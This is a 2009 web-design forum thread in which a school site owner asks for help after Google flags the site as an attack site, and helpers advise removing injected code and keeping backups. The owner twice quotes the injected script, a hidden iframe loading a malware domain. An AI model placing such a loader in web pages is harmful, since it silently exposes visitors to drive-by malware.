Google Reported Attack Site!...please help
-
-
- Debi Hoang
- Jr. Rocketeer
- Posts: 48
- Thanks: 0
-
Hello,
my site was reported as an attack site, so I had to move the site to a subfolder so parents don't see the error.
msmcatholic.org/hacked_site/index.php
error from Google:
What happened when Google visited this site?
Of the 27 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-06-05, and the last time suspicious content was found on this site was on 2009-06-05.
Malicious software is hosted on 1 domain(s), including directseek.org/.
Please help...
Thank you & God bless
-
-
-
- Amandeep Singh
- Preeminent Rocketeer
- Posts: 17652
- Thanks: 2
-
You can view this:
www.rockettheme.com/forum/index.php?f=21..._v=viewtopic#p321777
as this usually happens when malware gets injected in the site in form of iframes - Quick tips::
1) Clear your browser cache if changes dont reflect
2) Provide link to your site to help us help you better
3) Use in firebug
Tutorial-- http://www.rockettheme.com/blog/team/255-tools-firebug
softlogique.com
-
-
-
- prim
- Preeminent Rocketeer
- Posts: 17290
- Thanks: 217
-
A little more info about this page:
safeweb.norton.com/report/show?name=directseek.org
securityresponse.symantec.com/security_r...=2008-080702-2357-99 - Please reply with a direct link to the issue & create a new thread for each new issue.
A template is only as good as the content that goes into it
- DanG
-
-
-
- Debi Hoang
- Jr. Rocketeer
- Posts: 48
- Thanks: 0
-
yes, I see it in
<script language="javascript">
document.write( unescape( '<iframe src=" directseek.org/10/ " style="display:none"></iframe>' ) );
</script>
but is the solution, since this was the 1st solution given to me in my other post:
www.rockettheme.com/forum/index.php?f=17...55645&rb_v=viewtopic
Thank you
-
-
-
- Debi Hoang
- Jr. Rocketeer
- Posts: 48
- Thanks: 0
-
Amandeep Singh wrote:
You can view this:
www.rockettheme.com/forum/index.php?f=21..._v=viewtopic#p321777
as this usually happens when malware gets injected in the site in form of iframes
What can I do since the template comes w/ iframe; what should I replace it with?
thank youi
-
-
-
- prim
- Preeminent Rocketeer
- Posts: 17290
- Thanks: 217
- The script is probably injected into the template's index.php but i'm not sure. Anyway, you will need to locate the malware code and remove it.
- Please reply with a direct link to the issue & create a new thread for each new issue.
A template is only as good as the content that goes into it - DanG
-
-
-
- Ano Hito
- Rocketeer
- Posts: 87
- Thanks: 0
-
May I also suggest, looking into JoomlaPack, as it has been a life saver for me. I have a site that gets updates as many times as 30 a day, and recently I had a similar attack on that site, where not only was my J! site comprised, but my osC site under the same domain was too.
I have been using JoomlaPack regliously, as all my info was conveniently backed-up and I was back on the ball again.
I do not know what I would have done if I did not have my back-ups.
Also check out jFireWall EndPoint Protection Anti-Hacker and JoomSuite Defender. - Template: J! 3.x Paradigm
Add-ons: OSMap : OSMeta : RSForms! Pro : DISQUS Comments for Joomla : MailChimp Intergration : AddThis Smart Layers : Administrator Lock : Akeeba Backup
-
-
-
- Debi Hoang
- Jr. Rocketeer
- Posts: 48
- Thanks: 0
-
prim wrote:
The script is probably injected into the template's index.php but i'm not sure. Anyway, you will need to locate the malware code and remove it.
This is what I saw in the index.php file<script language="javascript">
document.write( unescape( '<iframe src=" directseek.org/10/ " style="display:none"></iframe>' ) );
</script>
do I remove everything?
thanks
-
-
-
- Amandeep Singh
- Preeminent Rocketeer
- Posts: 17652
- Thanks: 2
-
Best way would be to remove the iframe tags which you think to be suspicious
But do take a backup of your previous index.php file before doing so - Quick tips::
1) Clear your browser cache if changes dont reflect
2) Provide link to your site to help us help you better
3) Use in firebug
Tutorial-- http://www.rockettheme.com/blog/team/255-tools-firebug
softlogique.com
-
Time to create page: 0.079 seconds